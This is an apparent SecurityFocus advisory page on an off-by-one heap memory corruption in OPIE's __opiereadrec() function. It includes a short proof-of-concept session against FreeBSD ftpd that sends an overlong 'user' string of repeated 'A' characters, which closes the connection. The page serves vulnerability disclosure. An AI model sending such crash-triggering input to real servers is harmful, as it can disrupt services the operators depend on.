OPIE '__opiereadrec()' Off By One Heap Memory Corruption Vulnerability

An attacker may exploit this issue by enticing a victim into connecting to a malicious server.

The following proof-of-concept demonstrating this issue against the ftpd process on FreeBSD is available:

Connected to localhost.
Escape character is '^]'.
220 127.cx FTP server (Version 6.00LS) ready.
user cx
331 Password required for cx.
user AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Connection closed by foreign host.
127#


 

Privacy Statement
Copyright 2010, SecurityFocus